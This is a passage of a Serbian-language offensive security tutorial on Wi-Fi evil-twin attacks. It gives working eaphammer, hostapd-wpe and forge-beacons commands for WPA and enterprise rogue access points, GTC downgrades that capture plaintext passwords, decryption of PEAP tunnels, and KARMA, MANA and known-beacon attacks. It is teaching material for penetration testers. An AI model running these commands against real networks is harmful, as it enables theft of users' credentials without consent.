Molimo, primetite da podrazumevano, ako je ESSID u PNL-u sačuvan kao zaštićen WPA, uređaj se neće automatski povezati sa otvorenim zlim blizancem. Možete pokušati da DoS-ujete pravi AP i nadati se da će korisnik ručno povezati sa vašim otvorenim zlim blizancem, ili možete DoS-ovati pravi AP i koristiti WPA zlog blizanca da uhvatite handshake (koristeći ovu metodu nećete moći da pustite žrtvu da se poveže sa vama jer ne znate PSK, ali možete uhvatiti handshake i pokušati ga probiti).

Neki OS i AV će upozoriti korisnika da je povezivanje sa otvorenom mrežom opasno...

WPA/WPA2 Zli Blizanac

Možete kreirati Zlog Blizanca koristeći WPA/2 i ako su uređaji konfigurisani da se povežu sa tim SSID-om sa WPA/2, pokušaće da se povežu. U svakom slučaju, da biste završili 4-way-handshake takođe morate znati šifru koju će klijent koristiti. Ako je ne znate, povezivanje neće biti završeno.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Poslovni Evil Twin

Da biste razumeli ove napade, preporučujem da prvo pročitate kratko objašnjenje WPA Enterprise.

Korišćenje hostapd-wpe

hostapd-wpe zahteva konfiguracioni fajl da bi radio. Da biste automatizovali generisanje ovih konfiguracija, možete koristiti https://github.com/WJDigby/apd_launchpad (preuzmite python fajl unutar /etc/hostapd-wpe/).

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

U konfiguracionom fajlu možete izabrati različite stvari poput ssid, kanala, korisničkih fajlova, ključeva, dh parametara, verzije wpa i autentifikacije...

Korišćenje hostapd-wpe sa EAP-TLS za omogućavanje prijave bilo kog sertifikata.

Korišćenje EAPHammer-a

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Podrazumevano, EAPHammer koristi ove metode autentikacije (primetite da je GTC prva koja se koristi kako bi se dobile lozinke u obliku običnog teksta, a zatim se koriste pouzdanije metode autentikacije):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Ovo je podrazumevana metodologija kako biste izbegli dugačka vremena povezivanja. Međutim, takođe možete specificirati serveru metode autentikacije od najslabije do najjače:

--negotiate weakest

Ili možete koristiti:

  • --negotiate gtc-downgrade za korišćenje visoko efikasne implementacije GTC downgrade-a (lozinke u plaintext formatu)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP za ručno određivanje ponuđenih metoda (ponuđene autentikacione metode u istom redosledu kao organizacija će učiniti napad mnogo teže otkriti).
  • Pronađite više informacija u wiki-u

Korišćenje Airgeddon-a

Airgeddon može koristiti prethodno generisane sertifikate da ponudi EAP autentikaciju za WPA/WPA2-Enterprise mreže. Lažna mreža će smanjiti protokol veze na EAP-MD5 kako bi mogla uhvatiti korisnika i MD5 lozinke. Kasnije, napadač može pokušati da probije lozinku.
Airggedon vam nudi mogućnost kontinuiranog napada Evil Twin (buka) ili samo kreiranje Evil napada dok se neko poveže (neprimetno).

Otklanjanje grešaka u PEAP i EAP-TTLS TLS tunelima u napadima Evil Twins

Ovaj metod je testiran u PEAP vezi ali pošto dešifrujem proizvoljan TLS tunel, ovo bi takođe trebalo da funkcioniše sa EAP-TTLS

Unutar konfiguracije hostapd-wpe iskomentarišite liniju koja sadrži dh_file (od dh_file=/etc/hostapd-wpe/certs/dh do #dh_file=/etc/hostapd-wpe/certs/dh)
Ovo će naterati hostapd-wpe da razmenjuje ključeve koristeći RSA umesto DH, tako da ćete moći da dešifrujete saobraćaj kasnije znajući privatni ključ servera.

Sada pokrenite Evil Twin koristeći hostapd-wpe sa tom modifikovanom konfiguracijom kao i obično. Takođe, pokrenite wireshark na interfejsu koji vrši napad Evil Twin.

Sada ili kasnije (kada već uhvatite neke autentikacione namere) možete dodati privatni RSA ključ u wireshark-u na: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Dodajte novi unos i popunite formu sa ovim vrednostima: IP adresa = bilo koja -- Port = 0 -- Protokol = podaci -- Datoteka ključa (izaberite svoju datoteku ključa, da biste izbegli probleme izaberite datoteku ključa koja nije zaštićena lozinkom).

I pogledajte novi "Dešifrovani TLS" tab:

KARMA, MANA, Loud MANA i Known beacons napad

ESSID i MAC crne/belih lista

Različite vrste Media Access Control Filter Lists (MFACLs) i njihovi odgovarajući režimi i efekti na ponašanje lažne Access Point (AP):

  1. MAC bazirana bela lista:
  • Lažni AP će odgovoriti samo na upite uređaja navedenih u beloj listi, ostajući nevidljiv za sve ostale koji nisu navedeni.
  1. MAC bazirana crna lista:
  • Lažni AP će ignorisati upite uređaja na crnoj listi, efikasno čineći lažni AP nevidljivim za te specifične uređaje.
  1. SSID bazirana bela lista:
  • Lažni AP će odgovoriti na upite samo za specifične ESSID-ove navedene na listi, čineći ga nevidljivim za uređaje čiji Preferred Network List (PNL) ne sadrži te ESSID-ove.
  1. SSID bazirana crna lista:
  • Lažni AP neće odgovoriti na upite za specifične ESSID-ove na crnoj listi, čineći ga nevidljivim za uređaje koji traže te određene mreže.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Ova metoda omogućava napadaču da napravi zlonamernu tačku pristupa (AP) koja odgovara na sve zahteve za sondiranje uređaja koji pokušavaju da se povežu na mreže. Ova tehnika vara uređaje da se povežu na napadačev AP imitirajući mreže koje uređaji traže. Kada uređaj pošalje zahtev za povezivanje sa ovom lažnom AP, on završava vezu, navodeći uređaj da greškom poveže sa mrežom napadača.

MANA

Zatim su uređaji počeli da ignorišu neželjene mrežne odgovore, smanjujući efikasnost originalnog karma napada. Međutim, novi metod, poznat kao MANA napad, predstavili su Ian de Vilijers i Dominic Vajt. Ova metoda uključuje zlonamernu AP hvatanje Lista Preferisanih Mreža (PNL) sa uređaja odgovarajući na njihove emitovane zahteve za sondiranje sa imenima mreža (SSID) koje su prethodno tražili uređaji. Ovaj sofisticirani napad zaobilazi zaštitu protiv originalnog karma napada iskorišćavanjem načina na koji uređaji pamte i prioritizuju poznate mreže.

MANA napad funkcioniše tako što prati i usmerene i emitovane zahteve za sondiranje uređaja. Za usmerene zahteve, beleži MAC adresu uređaja i traženo ime mreže, dodajući ove informacije na listu. Kada se primi emitovan zahtev, AP odgovara informacijama koje se podudaraju sa bilo kojom od mreža na listi uređaja, privlačeći uređaj da se poveže sa zlonamernom AP.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Bučan MANA

Bučan MANA napad je napredna strategija kada uređaji ne koriste usmereno istraživanje ili kada je Lista preferiranih mreža (PNL) nepoznata napadaču. Ovaj napad funkcioniše na principu da uređaji u istom području verovatno dele neka imena mreža u svojim PNL-ovima. Umesto selektivnog odgovaranja, ovaj napad emituje odgovore na upite za svako ime mreže (ESSID) pronađeno u kombinovanim PNL-ovima svih posmatranih uređaja. Ovaj širok pristup povećava šansu da uređaj prepozna poznatu mrežu i pokuša da se poveže sa lažnom tačkom pristupa (AP).

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Poznati Beacon napad

Kada Loud MANA napad možda nije dovoljan, Poznati Beacon napad predstavlja drugi pristup. Ovom metodom se brute-force proces povezivanja simulira AP koji odgovara na bilo koje mrežno ime, prolazeći kroz listu potencijalnih ESSID-ova izvedenih iz wordlist-e. Ovo simulira prisustvo brojnih mreža, u nadi da će se podudarati ESSID unutar PNL žrtve, podstičući pokušaj povezivanja sa fabrikovanim AP-om. Napad se može pojačati kombinovanjem sa opcijom --loud za agresivniji pokušaj uhvatiti uređaje.

Eaphammer je implementirao ovaj napad kao MANA napad gde su svi ESSID-ovi unutar liste optuženi (takođe možete kombinovati ovo sa --loud opcijom da biste kreirali Loud MANA + Poznati beacon napad):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Poznati napad Beacon Burst

Poznati napad Beacon Burst uključuje brzo emitovanje okvira beacon za svaki ESSID naveden u datoteci. Ovo stvara gustu okolinu lažnih mreža, značajno povećavajući verovatnoću da se uređaji povežu sa zlonamernom AP, posebno kada se kombinuje sa MANA napadom. Ova tehnika koristi brzinu i obim da preplavi mehanizme izbora mreže uređaja.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct je protokol koji omogućava uređajima da se direktno povežu jedan s drugim koristeći Wi-Fi, bez potrebe za tradicionalnom bežičnom pristupnom tačkom. Ova sposobnost je integrisana u različite uređaje Internet stvari (IoT), kao što su štampači i televizori, olakšavajući direktnu komunikaciju uređaja sa uređajem. Značajna karakteristika Wi-Fi Direct-a je da jedan uređaj preuzima ulogu pristupne tačke, poznate kao vlasnik grupe, kako bi upravljao vezom.

Bezbednost za Wi-Fi Direct veze uspostavlja se putem Wi-Fi Protected Setup (WPS), koji podržava nekoliko metoda za sigurno uparivanje, uključujući:

  • Konfiguracija putem dugmeta (PBC)
  • Unos PIN-a
  • Near-Field Communication (NFC)

Ove metode, posebno unos PIN-a, podložne su istim ranjivostima kao i WPS u tradicionalnim Wi-Fi mrežama, čineći ih ciljevima sličnih vektora napada.

EvilDirect Hijacking

EvilDirect Hijacking je napad specifičan za Wi-Fi Direct. On oponaša koncept napada Evil Twin, ali cilja Wi-Fi Direct veze. U ovom scenariju, napadač se predstavlja kao legitimni vlasnik grupe sa ciljem da prevari uređaje da se povežu sa zlonamernim entitetom. Ovaj metod može se izvršiti korišćenjem alata poput airbase-ng navođenjem kanala, ESSID-a i MAC adrese oponašanog uređaja:

Reference

TODO: Pogledajte https://github.com/wifiphisher/wifiphisher (prijava putem Facebook-a i imitacija WPA na portalima za zarobljavanje)

Pridružite se HackenProof Discord serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!

Hacking Insights
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja

Vesti u realnom vremenu o hakovanju
Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu

Poslednje najave
Budite informisani o najnovijim nagradama za pronalaženje bagova i važnim ažuriranjima platforme

Pridružite nam se na Discord-u i počnite da sarađujete sa vrhunskim hakerima danas!

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: